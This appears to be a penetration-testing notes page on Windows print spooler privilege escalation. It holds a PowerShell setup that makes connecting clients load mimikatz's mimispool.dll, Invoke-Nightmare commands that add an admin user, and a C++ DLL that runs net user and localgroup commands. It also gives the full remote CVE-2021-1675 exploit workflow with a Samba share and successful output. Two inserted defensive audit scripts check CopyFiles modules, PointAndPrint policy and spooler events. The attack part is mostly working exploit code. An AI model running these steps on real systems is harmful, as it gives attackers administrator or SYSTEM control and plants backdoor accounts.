# Printer

### Universal Printer

Create the shared printer (server side):

```powershell
$printerName     = 'Universal Priv Printer'
$system32        = $env:systemroot + '\system32'
$drivers         = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName

# A copy of the legitimate mscms.dll named mimispool.dll goes into System32; the real
# mimispool.dll builds (x64 and x86) go into the driver directories served to clients.
Copy-Item -Force -Path ($system32 + '\mscms.dll')             -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll'   -Destination ($drivers  + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers  + '\W32X86\3\mimispool.dll')

# A shared printer on the stock 'Generic / Text Only' driver; no custom driver is needed.
Add-PrinterDriver -Name       'Generic / Text Only'
Add-Printer       -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared

# CopyFiles entries: Kiwi and Litchi deliver mimispool.dll to x64 and x86 clients;
# Mango names mimispool.dll as the Module, so the connecting client's spooler loads it.
New-Item         -Path ($RegStartPrinter + '\CopyFiles')        | Out-Null
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Directory' -PropertyType 'String'      -Value 'x64\3'           | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String'      -Value 'W32X86\3'        | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Mango')  | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Directory' -PropertyType 'String'      -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Files'     -PropertyType 'MultiString' -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Module'    -PropertyType 'String'      -Value 'mimispool.dll'   | Out-Null
```

Execute the driver (client side, by connecting to the shared printer):

```powershell
$serverName  = 'dc.purple.lab'
$printerName = 'Universal Priv Printer'
# The share name carries an architecture suffix, so pick the one matching this client.
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
```
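A defensive audit for the technique above, added here as an example (it is not part of these notes or of mimikatz): it walks every printer's `CopyFiles` subkeys and flags a `Module` that is itself one of the files the printer pushes to clients, or that is outside a baseline list, then lists unsigned DLLs in the spool driver directories. The baseline of `mscms.dll` as the only expected module is an assumption; adjust it to the host.

```powershell
# Added example: audit per-printer CopyFiles entries and spool driver directories.
# Assumption: mscms.dll is the only CopyFiles Module expected on this host; extend as needed.
$expectedModules = @('mscms.dll')
$printersKey     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers'
$spoolDrivers    = Join-Path $env:SystemRoot 'System32\spool\drivers'

$findings = @()
foreach ($printer in Get-ChildItem -Path $printersKey -ErrorAction SilentlyContinue) {
    $copyFiles = Join-Path $printer.PSPath 'CopyFiles'
    if (-not (Test-Path $copyFiles)) { continue }

    $entries   = @(Get-ChildItem -Path $copyFiles)
    # Every file name this printer delivers to clients, across all CopyFiles entries.
    $delivered = @()
    foreach ($e in $entries) {
        $delivered += (@((Get-ItemProperty -Path $e.PSPath).Files) | Where-Object { $_ })
    }
    foreach ($e in $entries) {
        $module = [string](Get-ItemProperty -Path $e.PSPath).Module
        if (-not $module) { continue }
        $issue = $null
        if ($delivered -contains $module) {
            # The Mango pattern: the Module the client spooler loads is a file the printer itself pushes.
            $issue = "Module '$module' is also a file this printer delivers to clients"
        } elseif ($expectedModules -notcontains $module.ToLower()) {
            $issue = "Module '$module' is not in the expected module list"
        }
        if ($issue) {
            $findings += [pscustomobject]@{ Printer = $printer.PSChildName; Item = $e.PSChildName; Issue = $issue }
        }
    }
}

# Second signal: unsigned DLLs sitting in the directories that point-and-print serves to clients.
Get-ChildItem -Path $spoolDrivers -Recurse -Filter '*.dll' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        if ($sig.Status -ne 'Valid') {
            $findings += [pscustomobject]@{ Printer = '-'; Item = $_.FullName; Issue = "Driver file not validly signed ($($sig.Status))" }
        }
    }

if ($findings) { $findings | Format-Table -AutoSize } else { 'No suspicious CopyFiles entries or unsigned spool DLLs found.' }
```

Run it elevated on the print server; the Module check is what distinguishes this trick from an ordinary driver package, since a normal entry names a module that already lives on the client.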

### PrintNightmare by Caleb Stewart and John Hammond

Full walkthrough: <https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html>

[CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675)

```
upload /opt/invoke-nightmare/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "Pwner" -NewPassword "Pwn123!"
```

### PrintNightmare by Cube0x0

Confirm the target exposes the print spooler RPC interface first:

```shell
# impacket-rpcdump @10.10.10.149 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol
```

**DLL**

[Cube0x0’s exploit](https://github.com/cube0x0/CVE-2021-1675) for PrintNightmare works remotely with creds. First, I’ll need to build a Dll. I’ve walked through this in [detail before for HackBack](https://0xdf.gitlab.io/2019/07/06/htb-hackback.html#arbitrary-write--diaghub--system). I’ll follow a similar set of steps to create a C++ DLL project, and use the following source for my Dll:

```cpp
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"       // Visual Studio precompiled header; pulls in windows.h
#include <stdlib.h>    // system()

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Runs once, when the spooler loads the DLL: add a user and make it a local admin.
        system("cmd.exe /c net user 0xdf 0xdf0xdf /add");
        system("cmd.exe /c net localgroup administrators 0xdf /add");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

The `DllMain` function will be called for various reasons, one of which is when a process loads the DLL. In that case, the `ul_reason_for_call` will be `DLL_PROCESS_ATTACH`. So the DLL will be loaded, will execute these two system commands, and then be done. I’ll compile that and copy it back to my Parrot VM.

**Samba**

Cube0x0 has an example Samba config to allow for anonymous access on his GitHub page. It’s important that the user on the last line exists on your host. I updated mine to match a user I had configured with access to nothing.

```ini
[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[share]
    comment = Samba
    path = /srv/smb/
    guest ok = yes
    read only = no
    browsable = yes
    force user = nobody
```

I’ll restart Samba to take the updated config:

```shell
sudo service smbd restart
```

It’s also important that that user can read from the SMB share, so I’ll set that directory to be owned by that user:

```shell
sudo chown -R nobody:root smb/
sudo chmod -R 777 smb/
ls -l smb/
total 12
-rwxrwxrwx 1 nobody root 10240 Jul  7 22:10 AddUserDll.dll
```

**Impacket**

I’ll clone the repo and rename it:

```shell
cd /opt/
git clone https://github.com/cube0x0/CVE-2021-1675
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 159, done.
remote: Counting objects: 100% (159/159), done.
remote: Compressing objects: 100% (98/98), done.
remote: Total 159 (delta 55), reused 124 (delta 32), pack-reused 0
Receiving objects: 100% (159/159), 1.45 MiB | 7.37 MiB/s, done.
Resolving deltas: 100% (55/55), done.
mv CVE-2021-1675 SharpPrintNightmare
cd SharpPrintNightmare/
```

This exploit uses a modified version of [Impacket](https://github.com/cube0x0/impacket). I’ll clone that into this directory:

```shell
git clone https://github.com/cube0x0/impacket
Cloning into 'impacket'...
remote: Enumerating objects: 19570, done.
remote: Counting objects: 100% (645/645), done.
remote: Compressing objects: 100% (304/304), done.
remote: Total 19570 (delta 386), reused 531 (delta 339), pack-reused 18925
Receiving objects: 100% (19570/19570), 6.82 MiB | 9.18 MiB/s, done.
Resolving deltas: 100% (14798/14798), done.
```

To avoid messing up my system install, I’ll create a virtual environment, activate it, and install Impacket in there.

**Run Exploit**

With all the pieces assembled, I can run the exploit. I’ll give it the creds for the hazard user which work for an RPC connection, as well as the path to the DLL on the SMB share:

```shell
(venv) shashwat@Kali-VM$ python3 CVE-2021-1675.py 'Domain/user:password@10.xx.xx.xx' '\\10.10.xx.xx\share\AddUserDll.dll'
[*] Connecting to ncacn_np:10.xx.xx.xx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \\10.10.xx.xx\share\AddUserDll.dll
[*] Try 1...
[*] Stage0: 0
[*] Stage2: 0
[+] Exploit Completed
```

It worked!
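On the receiving end, the remote driver install above is the event a defender looks for. The following check is an added example (not from these notes or from either exploit): it reads the PointAndPrint policy values that gate non-admin driver installation, reports the spooler state, and pulls the PrintService events a driver add leaves behind, flagging any whose file list references a UNC path. The Operational log being disabled by default, and the choice of event IDs 316 and 808, are stated in the comments.

```powershell
# Added example: PrintNightmare mitigation state plus driver-install evidence from the spooler logs.
$pnp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$p   = Get-ItemProperty -Path $pnp -ErrorAction SilentlyContinue   # $null when the key is absent

# Expected hardened state: RestrictDriverInstallationToAdministrators = 1 and the two
# point-and-print prompt overrides absent or 0. Anything else lets non-admins add drivers.
$checks = [ordered]@{
    'RestrictDriverInstallationToAdministrators = 1' = ([int]$p.RestrictDriverInstallationToAdministrators -eq 1)
    'NoWarningNoElevationOnInstall = 0 or absent'     = ([int]$p.NoWarningNoElevationOnInstall -eq 0)
    'UpdatePromptSettings = 0 or absent'              = ([int]$p.UpdatePromptSettings -eq 0)
}
foreach ($c in $checks.GetEnumerator()) {
    '{0} {1}' -f $(if ($c.Value) { '[OK]  ' } else { '[WARN]' }), $c.Key
}
'[INFO] Spooler service is {0} (stop it on hosts that never print)' -f (Get-Service -Name Spooler).Status

# Event 316 (PrintService/Operational, disabled by default; enable with
#   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true)
# records each driver add/update with its file list. Event 808 (PrintService/Admin) records a
# plug-in module the spooler failed to load. A driver whose files come from a UNC path is the signal.
$filters = @(
    @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316 },
    @{ LogName = 'Microsoft-Windows-PrintService/Admin';       Id = 808 }
)
foreach ($f in $filters) {
    Get-WinEvent -FilterHashtable $f -MaxEvents 50 -ErrorAction SilentlyContinue |
        ForEach-Object {
            $flag = if ($_.Message -match '\\\\[^\\\s]+\\') { 'UNC' } else { '   ' }
            '{0} {1} {2,-4} {3}' -f $_.TimeCreated, $flag, $_.Id, ($_.Message -replace '\s+', ' ')
        }
}
```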
